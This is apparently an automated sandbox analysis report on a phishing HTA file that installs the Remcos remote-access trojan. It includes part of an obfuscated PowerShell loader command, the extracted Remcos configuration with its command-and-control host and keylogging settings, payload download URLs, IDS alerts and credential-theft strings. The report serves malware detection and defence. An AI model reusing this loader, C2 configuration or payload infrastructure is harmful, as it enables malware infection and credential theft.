WF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7436, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.cmdline", ProcessId: 7572, ProcessName: csc.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 8136, TargetFilename: C:\ProgramData\remcos\logs.dat
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-13T07:38:40.260058+010020204251Exploit Kit Activity Detected104.21.84.67443192.168.2.449740TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-13T07:38:40.260058+010020204241Exploit Kit Activity Detected104.21.84.67443192.168.2.449740TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-13T07:38:42.909162+010020365941Malware Command and Control Activity Detected192.168.2.449741192.3.101.1496946TCP
                        2024-12-13T07:38:45.049735+010020365941Malware Command and Control Activity Detected192.168.2.449742192.3.101.1496946TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-13T07:38:23.463660+010020490381A Network Trojan was detected151.101.1.137443192.168.2.449733TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-13T07:38:45.295457+010028033043Unknown Traffic192.168.2.449743178.237.33.5080TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-13T07:38:41.214448+010028582951A Network Trojan was detected104.21.84.67443192.168.2.449740TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-13T07:38:12.054647+010028587951A Network Trojan was detected192.168.2.44973223.95.235.2980TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-13T07:38:39.828894+010028410751Malware Command and Control Activity Detected192.168.2.449740104.21.84.67443TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0000000C.00000002.4182814346.0000000000628000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["submarrine.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GH3PRL", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                        Source: greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaVirustotal: Detection: 33%Perma Link
                        Source: greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaReversingLabs: Detection: 23%
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4186207219.000000000244F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4182814346.0000000000669000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4182814346.0000000000628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4182814346.0000000000650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8136, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0043293A
                        Source: powershell.exe, 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_d62b3407-9

                        Exploits

                        barindex
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8136, type: MEMORYSTR

                        Privilege Escalation

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764

                        Phishing

                        barindex
                        Source: Yara matchFile source: greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta, type: SAMPLE
                        Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.4:49733 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49740 version: TLS 1.2
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2116447936.00000000070BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2115527740.0000000006C20000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2116447936.00000000070BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2115527740.0000000006C20000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2116447936.00000000070BA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib
                        Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.pdb source: powershell.exe, 00000003.00000002.1845557104.000000000541F000.00000004.00000800.00020000.00000000.sdmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06

                        Software Vulnerabilities

                        barindex
                        Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49732 -> 23.95.235.29:80
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49742 -> 192.3.101.149:6946
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49741 -> 192.3.101.149:6946
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.4:49740
                        Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.4:49740
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.4:49740
                        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.4:49733
                        Source: Malware configuration extractorURLs: submarrine.duckdns.org
                        Source: unknownDNS query: name: paste.ee
                        Source: unknownDNS query: name: submarrine.duckdns.org
                        Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /r/Bdiyv/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 23.95.235.29 23.95.235.29
                        Source: Joe Sandbox ViewIP Address: 192.3.101.149 192.3.101.149
                        Source: Joe Sandbox ViewIP Address: 151.101.1.137 151.101.1.137
                        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49743 -> 178.237.33.50:80
                        Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49740 -> 104.21.84.67:443
                        Source: global trafficHTTP traffic detected: GET /90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.29Connection: Keep-Alive
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04EA7A18 URLDownloadToFileW,3_2_04EA7A18
                        Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /r/Bdiyv/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.29Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: CasPol.exe, 00000010.00000002.2133399989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                        Source: CasPol.exe, CasPol.exe, 00000010.00000002.2133399989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                        Source: CasPol.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                        Source: CasPol.exe, 0000000D.00000002.2143185511.0000000001549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                        Source: CasPol.exe, 0000000D.00000002.2143185511.0000000001549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                        Source: CasPol.exe, 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                        Source: CasPol.exe, 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                        Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                        Source: global trafficDNS traffic detected: DNS query: paste.ee
                        Source: global trafficDNS traffic detected: DNS query: submarrine.duckdns.org
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: powershell.exe, 00000003.00000002.1854595650.00000000086AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/.Automation.resources
                        Source: powershell.exe, 00000003.00000002.1845557104.000000000541F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/veryniceb
                        Source: powershell.exe, 00000003.00000002.1845557104.000000000541F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1843837041.000000000309E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF
                        Source: powershell.exe, 00000003.00000002.1852317348.0000000007754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF9
                        Source: powershell.exe, 00000003.00000002.1854595650.00000000086AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFa
                        Source: powershell.exe, 00000003.00000002.1852317348.0000000007754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFf
                        Source: powershell.exe, 00000003.00000002.1843837041.0000000003138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFntLMEM
                        Source: bhv715D.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: bhv715D.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                        Source: powershell.exe, 00000003.00000002.1852317348.0000000007754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                        Source: bhv715D.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: bhv715D.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                        Source: bhv715D.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: CasPol.exe, CasPol.exe, 0000000C.00000002.4182814346.0000000000685000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4182814346.0000000000669000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4182814346.0000000000650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                        Source: powershell.exe, 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp4
                        Source: powershell.exe, 00000003.00000002.1845557104.000000000541F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                        Source: powershell.exe, 00000003.00000002.1850483491.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: bhv715D.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004957000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000003.00000002.1845557104.0000000005088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000003.00000002.1845557104.0000000004F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2076283466.0000000004801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000003.00000002.1845557104.0000000005088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004957000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
